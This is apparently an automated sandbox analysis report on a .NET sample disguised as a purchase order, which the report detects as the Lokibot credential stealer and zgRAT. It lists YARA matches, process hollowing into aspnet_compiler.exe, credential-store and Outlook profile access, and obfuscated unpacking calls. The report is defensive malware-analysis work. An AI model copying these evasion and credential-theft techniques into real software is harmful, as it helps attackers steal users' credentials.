Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.0.rPedidodecompra__PO20441__ARIMComponentes.exe.c40000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: rPedidodecompra__PO20441__ARIMComponentes.exe PID: 2584, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: aspnet_compiler.exe PID: 6128, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: rPedidodecompra__PO20441__ARIMComponentes.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: rPedidodecompra__PO20441__ARIMComponentes.exe, SiOO3t3R5b6SHg7iKj.cs	Cryptographic APIs: 'TransformBlock'
Source: rPedidodecompra__PO20441__ARIMComponentes.exe, SiOO3t3R5b6SHg7iKj.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: rPedidodecompra__PO20441__ARIMComponentes.exe, rNGlM7IEQG3GfpwW0XK.cs	Cryptographic APIs: 'CreateDecryptor'
Source: rPedidodecompra__PO20441__ARIMComponentes.exe, rNGlM7IEQG3GfpwW0XK.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/3@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

2_2_0040650A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

2_2_0040434D

Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rPedidodecompra__PO20441__ARIMComponentes.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Mutant created: NULL

Source: rPedidodecompra__PO20441__ARIMComponentes.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: rPedidodecompra__PO20441__ARIMComponentes.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe "C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe"
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: rPedidodecompra__PO20441__ARIMComponentes.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: rPedidodecompra__PO20441__ARIMComponentes.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: rPedidodecompra__PO20441__ARIMComponentes.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: BATMAN.pdbxD source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115259335.0000000002F10000.00000004.08000000.00040000.00000000.sdmp, rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115300674.0000000003041000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: WindowsFormsApp1.pdb source: rPedidodecompra__PO20441__ARIMComponentes.exe
Source:	Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3328577920.00000000009C2000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: BATMAN.pdb source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115259335.0000000002F10000.00000004.08000000.00040000.00000000.sdmp, rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115300674.0000000003041000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: rPedidodecompra__PO20441__ARIMComponentes.exe, rNGlM7IEQG3GfpwW0XK.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{uiQCT4ArHkmBkiUcGXG(typeof(IntPtr).TypeHandle),uiQCT4ArHkmBkiUcGXG(typeof(Type).TypeHandle)})

.NET source code contains potential unpacker

Source: rPedidodecompra__PO20441__ARIMComponentes.exe, zbHLRJeBpRqbxvO4jX.cs	.Net Code: UXZOENPmm System.Reflection.Assembly.Load(byte[])
Source: rPedidodecompra__PO20441__ARIMComponentes.exe, VZclfkIa72LcpRmJj7.cs	.Net Code: VZcIlfka7 System.Reflection.Assembly.Load(byte[])

Yara detected aPLib compressed binary

Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rPedidodecompra__PO20441__ARIMComponentes.exe PID: 2584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 6128, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 2_2_00402AC0 push eax; ret		2_2_00402AD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 2_2_00402AC0 push eax; ret		2_2_00402AFC

Source: rPedidodecompra__PO20441__ARIMComponentes.exe

Static PE information: section name: .text entropy: 7.375405459723751

Source: rPedidodecompra__PO20441__ARIMComponentes.exe, qdSZcxPNra1tnO6ofV.cs	High entropy of concatenated method names: 'q5CRP2dSZ', 'NQa75Hud7pIQKS8Uek5', 'IoBiNvu0flo4kEbDbwj', 'isP69puA2DYHrKZGsMu', 'vXtf5XuvbulXm5rm9YJ', 'j2FqNKuHLjISt76omO5', 'fqwqgCuyTRQka5CffLt', 'bqsbtVuTZ6RVXmEk3bI'
Source: rPedidodecompra__PO20441__ARIMComponentes.exe, SiOO3t3R5b6SHg7iKj.cs	High entropy of concatenated method names: 'jQJX4xDRX', 'Vc0uUhoE6', 'tjawBRewx', 'SiONO3tR5', 'M6SpHg7iK', 'tfNoL1jF3tb1fuNbsIQ', 'TPEH6GjUcPJDcrUltIq', 'b90DKXjp6nyTeywqZvx', 'BMXpgKjtJ8TycgiYxLT', 'mKOyeEjfk5tPnvpjd0f'
Source: rPedidodecompra__PO20441__ARIMComponentes.exe, tGpPDjjvI15ahjtZQP.cs	High entropy of concatenated method names: 'aYN6GyA08', 'U7g5Le1rX', 'x7qiOAs08', 'TE5EfZGpP', 'njvLI15ah', 'JU7oADjN7aSXZudev3Z', 'kqOLPtjBeA8pi3hMh35', 'hKZQ40j7d5ELSOv6PaB', 'WAk3GKjeAxejCyaRYhF', 'sPuDQhjmPjI2q7C80oR'
Source: rPedidodecompra__PO20441__ARIMComponentes.exe, Form1.cs	High entropy of concatenated method names: 'Dispose', 'IVnemkL1R', 'kx6D9R2IKeFhAXZoIt', 'c6f7NmlOQYhpbWpSp8', 'GJ5jcP8qXwPI0Ipg1J', 'Ep9dF8xaeaeqmYB4br', 'IW2o4Nh0ArrD5opeUt', 'pkvIRTLcew8EDvZvbG', 'T8owIYggojVPiWhIaZ', 'nCOTbZWHDf3gtTcOwD'
Source: rPedidodecompra__PO20441__ARIMComponentes.exe, iFkbkSEm4ZkOngNvhj.cs	High entropy of concatenated method names: 'us9IT7wa2S', 'keWqjnu5YP5uFcn5qY7', 'ltoDHauESU0TiZSIe6I', 'yp4LqbuRWo2i6R9R0UJ', 'ufekVnui5HuxQUDiYUT', 'GojIJhuF0dafZ2VeTXD', 'rMbTjPuU6m0hkW81pwJ', 'tHYh38upHuihwcB4rJE', 'G5KQJkutGnQcOVrdSU8', 'aLY4K5uf22nvrjcMjnX'
Source: rPedidodecompra__PO20441__ARIMComponentes.exe, zbHLRJeBpRqbxvO4jX.cs	High entropy of concatenated method names: 'DNqS62NfW', 'UXZOENPmm', 'aBDf7ngCq', 'oIBnIqi2G', 'k24EoROA5SV5xF0fO1', 'jR4dHpMdy7QEp0ohvS', 'ikOpMD9BgpPCulqaAk', 'BUCXbiR12uiHh3pAbL', 'dwxYrtiQJMghnWapZL', 'rgwDjx5w7KMqn7EKi2'
Source: rPedidodecompra__PO20441__ARIMComponentes.exe, VZclfkIa72LcpRmJj7.cs	High entropy of concatenated method names: 'VZcIlfka7', 'qLcTpRmJj', 'xkDltnICg', 'UsaaaWhiF', 'k8xY0rApkAb9aAEp7i', 'aw02KEvG1BtxHoBaVZ', 'k01pECdR63nKtvdobQ', 'PR9t8H0jnsDqnwTZuR', 'ugRXwjHy330CI8D22A'
Source: rPedidodecompra__PO20441__ARIMComponentes.exe, rNGlM7IEQG3GfpwW0XK.cs	High entropy of concatenated method names: 'o4SqsBAGQSgEjaYeVjU', 'YCTdiuAPWLdpWCih9Go', 'I3unV0AtiqF8j09r56V', 'Iq2sdcAfdIgPHvWag9C', 'gAklD5KYnn', 'gJtchuAzlViQ7Kfbo7Y', 'K9VRRNvcW3LbYhpa2G3', 'E1Qoa0vjVSvOpQfRToJ', 'bpja2iAS78nFdIDt2Uo', 'NAnS83A6563TT3cVmFf'

Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rPedidodecompra__PO20441__ARIMComponentes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
